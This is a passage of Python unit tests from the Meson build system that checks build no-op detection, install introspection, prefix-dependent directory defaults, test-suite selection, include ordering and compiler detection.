compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somfxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# target private dir
someexe_id = Target.construct_id_from_path("sub4", "someexe", "@exe")
self.assertPathEqual(incs[0], "-I" + os.path.join("sub4", someexe_id))
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
self.assertPathEqual(incs[0], '-Isomefxe@exe')
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
